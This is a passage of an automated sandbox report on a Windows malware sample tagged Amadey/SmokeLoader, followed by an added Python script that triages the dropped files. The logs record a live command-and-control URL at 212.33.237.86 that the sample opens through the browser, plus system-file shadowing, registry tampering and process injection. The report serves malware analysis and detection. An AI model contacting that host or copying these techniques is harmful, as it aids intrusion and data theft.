File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..ice-daf-pospayments_31bf3856ad364e35_10.0.22000.1_none_abd5b42ed12df708\pospaymentsworker.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_e4b70edd74d735f3\f\RMActivate_isv.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
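Every file-creation row above is attributed to the sample itself and almost all follow one pattern: a new file dropped next to an existing Windows binary under WinSxS, servicing\LCU, SystemApps, BitLockerDiscoveryVolumeContents or the .NET GAC, named after that binary with a trailing `_` or `-` (CredDialogHost.exe is the one name without a marker). The report records only that the files were created, not what they contain. The Python below is an added triage example, not part of the sandbox report or its tooling: it parses rows in the report's flat "File created <path> <process> <target>" format, separates the dropped name from its marker, and groups the drops by location and by the system file they sit beside. The ten embedded rows are copied from the table above; the root labels, the marker regex and the grouping are this example's own assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed input: ten rows copied from the file-creation table of this report.
SAMPLE = (
    r"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89"
    r"_amadey_blackenergy_elex_smoke-loader_stop.exe"
)
WINSXS = r"C:\Windows\WinSxS"
LCU = r"C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3"
ROWS = [
    rf"File created {WINSXS}\amd64_microsoft-windows-com-dtc-tracing_31bf3856ad364e35_10.0.22000.1_none_6e22e868f79867b0\msdtcvtr.bat_ {SAMPLE} N/A",
    rf"File created {WINSXS}\amd64_microsoft-windows-ie-setup-support_31bf3856ad364e35_11.0.22000.348_none_04e0603a0d245e07\ie4uinit.exe_ {SAMPLE} N/A",
    rf"File created {WINSXS}\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe_ {SAMPLE} N/A",
    rf"File created {WINSXS}\amd64_microsoft-windows-winrsplugins_31bf3856ad364e35_10.0.22000.1_none_6c7a140d3670631f\winrs.exe- {SAMPLE} N/A",
    rf"File created {LCU}\amd64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_f927204bf41f3d61\f\quickassist.exe- {SAMPLE} N/A",
    rf"File created {WINSXS}\amd64_microsoft-windows-smss-minwin_31bf3856ad364e35_10.0.22000.1_none_d4a473e8ed9480cf\smss.exe- {SAMPLE} N/A",
    rf"File created C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe_ {SAMPLE} N/A",
    rf"File created {LCU}\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe- {SAMPLE} N/A",
    rf"File created C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\CredDialogHost.exe {SAMPLE} N/A",
    rf"File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMSvcHost\v4.0_4.0.0.0__b03f5f7f11d50a3a\SMSvcHost.exe_ {SAMPLE} N/A",
]

# "<original name with extension>" followed by a single '_' or '-' marker (assumed pattern).
MARKER_RE = re.compile(r"^(?P<orig>.+\.[A-Za-z0-9]{1,4})(?P<marker>[_-])$")


def parse_row(row: str) -> dict:
    """Split one row into path, creating process and target. Both path and process
    are absolute Windows paths that may contain spaces, so the row is cut at the
    last ' C:\\' (start of the process column) rather than on whitespace."""
    if not row.startswith("File created "):
        raise ValueError(f"not a file-creation row: {row!r}")
    body, target = row[len("File created "):].rsplit(" ", 1)
    cut = body.rfind(" C:\\")
    if cut < 0:
        raise ValueError(f"cannot find process column in: {row!r}")
    return {"path": body[:cut], "process": body[cut + 1:], "target": target}


def classify(path: str) -> dict:
    """Describe a dropped file: its top-level directory under C:\\Windows (or the
    first path component elsewhere), the system file name it shadows, and the marker."""
    name = path.rsplit("\\", 1)[-1]
    m = MARKER_RE.match(name)
    original, marker = (m.group("orig"), m.group("marker")) if m else (name, "")
    parts = path.split("\\")
    root = parts[2] if len(parts) > 2 and parts[1].lower() == "windows" else parts[1]
    return {"name": name, "original": original, "marker": marker, "root": root}


def summarize(rows) -> dict:
    """Aggregate the drops: counts per marker and per root directory, system files
    shadowed more than once, names without a marker, and the creating processes."""
    by_marker, by_root = Counter(), Counter()
    by_original = defaultdict(list)
    unmarked, creators = [], set()
    for row in rows:
        rec = parse_row(row)
        info = classify(rec["path"])
        by_marker[info["marker"] or "(none)"] += 1
        by_root[info["root"]] += 1
        by_original[info["original"].lower()].append(rec["path"])
        if not info["marker"]:
            unmarked.append(info["name"])
        creators.add(rec["process"])
    return {
        "total": len(rows),
        "by_marker": dict(by_marker),
        "by_root": dict(by_root),
        "duplicated_originals": {k: v for k, v in by_original.items() if len(v) > 1},
        "unmarked": sorted(unmarked),
        "creators": sorted(creators),
    }


if __name__ == "__main__":
    for key, value in summarize(ROWS).items():
        print(f"{key}: {value}")
```

Run against the full table, the same code gives the complete list of shadowed system binaries, which is the list to check on a compromised host for leftover `_`/`-` files beside their originals.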

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "13" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh = "268435456" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListDomainAttributeSet = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "8" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\SubSysId = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\Revision = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow = "395196024" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "9" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateLowDateTime = "1853774386" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh = "268435456" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\HomepagesUpgradeVersion = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPMigrationVer = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow = "395196024" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\SoftwareFallback = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\VendorId = "4318" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\GPU\DeviceId = "140" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\StaleCompatCache = "0" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\VersionManager\FirstCheckForUpdateHighDateTime = "31190320" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1418876453-2228697459-2788511057-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Program Files\Internet Explorer\IEXPLORE.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133961046444521985" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1418876453-2228697459-2788511057-1000\{485D920B-9929-4D58-BCA8-339A43C5A821} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3064 wrote to memory of 1184 (2 events) N/A C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe C:\Program Files\Internet Explorer\IEXPLORE.exe
PID 1184 wrote to memory of 5292 (2 events) N/A C:\Program Files\Internet Explorer\IEXPLORE.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5444 (2 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5136 (2 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 4896 (51 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5292 wrote to memory of 5000 (5 events) N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe

"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"

C:\Program Files\Internet Explorer\IEXPLORE.exe

"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "http://212.33.237.86/images/1/report.php"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffcb88ff208,0x7ffcb88ff214,0x7ffcb88ff220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2172 /prefetch:11

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2136,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2532,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2676 /prefetch:13

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3356,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5372,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe

cookie_exporter.exe --cookie-json=1128

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6324,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3428,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5676,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6500 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=3404,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2836 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5952,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=872,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5512,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3592,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5780,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:10

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ÔN@

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3872,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:14

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:80 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
RU 212.33.237.86:443 tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
RU 212.33.237.86:443 tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.27.68:443 copilot.microsoft.com tcp
RU 212.33.237.86:443 tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
RU 212.33.237.86:443 tcp
RU 212.33.237.86:80 tcp
RU 212.33.237.86:80 tcp
GB 2.18.27.89:443 www.bing.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
